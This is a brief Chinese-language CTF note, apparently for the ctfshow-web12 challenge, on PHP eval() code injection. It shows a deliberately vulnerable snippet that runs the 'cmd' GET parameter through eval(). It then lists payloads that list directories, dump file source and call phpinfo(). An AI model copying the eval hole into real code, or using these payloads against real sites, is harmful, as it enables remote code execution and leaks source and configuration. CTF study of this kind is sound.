php_eval()函数读取信息
eval()
ctfshow-web12
<?php
$cmd=$_GET['cmd'];
eval($cmd);
?>
读取./目录文件
?cmd=print_r(scandir('./'));
读取example.php文件
?cmd=show_source('example.php');
读取example.php文件
?cmd=highlight_file('example.php');
?cmd=phpinfo();